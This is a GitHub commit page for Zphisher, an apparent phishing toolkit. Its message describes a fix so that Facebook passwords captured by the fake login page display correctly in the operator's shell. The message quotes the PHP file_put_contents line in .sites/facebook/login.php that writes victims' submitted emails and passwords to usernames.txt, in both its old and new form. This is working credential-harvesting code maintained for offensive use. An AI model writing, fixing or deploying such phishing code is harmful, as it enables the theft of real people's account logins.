Commit 397f8a8
authored
Graphical shell error for facebook login
This error appears only with Facebook login.
When we select the facebook login in Zphisher, in the shell we can't see the password we obtained.
In particular the error is at line 2 of .sites/facebook/login.php
`file_put_contents("usernames.txt", "Facebook Username: " . $_POST['email'] . "\nPassword: " . $_POST['pass'] ."\n", FILE_APPEND);`
To see the password we need to change the line of code to:
`file_put_contents("usernames.txt", "Facebook Username: " . $_POST['email'] . "Pass: " . $_POST['pass'] ."\n", FILE_APPEND);`1 parent e9b4c48 commit 397f8a8
1 file changed
+2
-2
lines changed| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
| |||
1 | 1 | | |
2 | | - | |
| 2 | + | |
3 | 3 | | |
4 | 4 | | |
5 | | - | |
| 5 | + | |
0 commit comments